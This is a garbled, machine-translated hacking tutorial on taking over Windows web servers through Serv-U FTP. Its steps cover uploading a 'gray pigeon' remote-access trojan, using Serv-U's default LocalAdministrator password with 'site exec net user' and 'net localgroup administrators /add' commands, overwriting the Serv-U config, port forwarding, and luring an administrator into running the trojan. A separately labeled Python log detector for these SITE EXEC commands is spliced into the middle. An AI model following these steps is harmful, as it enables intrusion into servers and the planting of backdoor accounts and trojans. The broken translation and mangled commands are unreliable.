I. First, check whether the web server has the remote terminal service open on port 3389.
II. Check whether the FTP service is Serv-U (and which version).
Method
I. Copy the website address and connect to it with the 3389 remote desktop client (to see whether it succeeds).
If the connection is available, the chance of taking the server is increased by 30%.
II. Check the server version over FTP.
Start > Run > cmd > ftp (followed by the website you want to log on to)
--------------------------------------------------------------------------------
Step 1: The simplest method
Check whether you have permission to execute commands. If you do, upload a pigeon directly and run it (the success rate is very low).
--------------------------------------------------------------------------------
Step 2: Find a directory with execute permission
C:\winnt\system32\inetsrv\data
C:\Documents and Settings\All Users
C:\Program Files\serv-u
C:\Program Files\Microsoft SQL Server
Files uploaded to such a directory can be run directly.
--------------------------------------------------------------------------------
Step 3: directly add an account to the ftp.exe file of the personal account and Account Opening
The command is to upload the Directory D: VMware workstationconfigur.exe "net user xiao/add"
--------------------------------------------------------------------------------
Step 4: Escalate privileges directly with an ASP privilege-escalation Trojan
Against Serv-U 6.3 an ASP privilege-escalation Trojan seems to have been used (unsuccessful).
Serv-U 6.2 seems to be okay.
However, the attacker cannot use ASP Trojans to view servers.
It is assumed that after the authentication is directly obtained using ASP, it is still unsuccessful, but you can use this account to connect from cmd.
ftp (the website you are escalating privileges on)
Account: LocalAdministrator password: $ ak #. 1 k; 0 @ p "> #1 @ $ ak #. 1 k; 0 @ p
If the connection is successful, you can directly add an administrator account.
Command: quote site exec (the account you added). net user 123 123/ad
Quote site exec (escalate the account to the highest permission) net localgroup administartors 123/add
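A defender's view of Step 4, as an added example that is not part of the original page: it scans an FTP command log for SITE EXEC commands and rates as high those that change accounts or come from the Serv-U LocalAdministrator account. The log layout and the sample lines are constructed for this example and are an assumption, not Serv-U's documented log format.

```python
import re

# Constructed sample lines; the "[time] (session) ip user> COMMAND" layout is
# an assumption made for this example.
SAMPLE_LOG = """\
[2008-03-01 10:14:02] (000012) 203.0.113.7 webuser> USER webuser
[2008-03-01 10:14:05] (000012) 203.0.113.7 webuser> STOR index.asp
[2008-03-01 10:15:40] (000013) 127.0.0.1 LocalAdministrator> USER LocalAdministrator
[2008-03-01 10:15:44] (000013) 127.0.0.1 LocalAdministrator> SITE EXEC net user 123 123 /add
[2008-03-01 10:15:49] (000013) 127.0.0.1 LocalAdministrator> site exec net localgroup administrators 123 /add
[2008-03-01 10:20:11] (000014) 198.51.100.9 webuser> SITE EXEC cmd.exe /c dir
"""

LINE_RE = re.compile(
    r"^\[(?P<time>[^\]]+)\]\s+\((?P<session>\d+)\)\s+(?P<ip>\S+)\s+"
    r"(?P<user>[^>\s]+)>\s+(?P<cmd>.*)$")
SITE_EXEC_RE = re.compile(r"^SITE\s+EXEC\s+(?P<payload>.+)$", re.IGNORECASE)
# Account creation or promotion to the administrators group via net.exe.
ACCOUNT_RE = re.compile(
    r"\bnet1?(?:\.exe)?\s+(?:user\b.*?/add|localgroup\s+administrators\b.*?/add)",
    re.IGNORECASE)

def find_site_exec(log_text):
    """Return one finding per SITE EXEC command, with the reasons it was flagged."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a command line in the assumed layout
        exec_m = SITE_EXEC_RE.match(m["cmd"].strip())
        if not exec_m:
            continue
        reasons = ["site-exec"]
        if ACCOUNT_RE.search(exec_m["payload"]):
            reasons.append("account-change")
        if m["user"].lower() == "localadministrator":
            reasons.append("serv-u-local-admin")
        findings.append({
            "time": m["time"], "session": m["session"], "ip": m["ip"],
            "user": m["user"], "payload": exec_m["payload"],
            "reasons": reasons,
            "severity": "high" if len(reasons) > 1 else "medium",
        })
    return findings

if __name__ == "__main__":
    for f in find_site_exec(SAMPLE_LOG):
        print(f["severity"], f["time"], f["ip"], f["user"], f["payload"], f["reasons"])
```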
--------------------------------------------------------------------------------
Step 5: pcAnywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere
Download his GIF file and install pcAnywhere locally.
There are many tutorials on the Internet.
--------------------------------------------------------------------------------
Step 6: Enable Serv-U overwrite
Install Serv-U (su) locally and use the ServUDaemon.ini file downloaded from him.
There are many tutorials on the Internet.
--------------------------------------------------------------------------------
Step 7: Serv-U port forwarding
I used this method to add salt to Latte (a full set of tutorials on serv-u classic Privilege Escalation). You can learn it.
Upload port forwarding tools
Command: (Tool Name) -v -l 3333 -r 43958 127.0.0.1
This maps port 3333 to port 43958. You can then install Serv-U locally and create a new server,
Fill in the IP address of the other party. The password for the Account LocalAdministrator is $ ak #. 1 k; 0 @ p "> #1 @ $ ak #. 1 k; 0 @ p,
After the connection, you can manage his Serv-U.
--------------------------------------------------------------------------------
Step 8: Privilege escalation through social engineering
Upload the gray pigeon, place it on drive C, and then wait for the administrator to run it; for this your pigeon must not be killed.
(If I saw an unfamiliar exe program, I would want to open it.)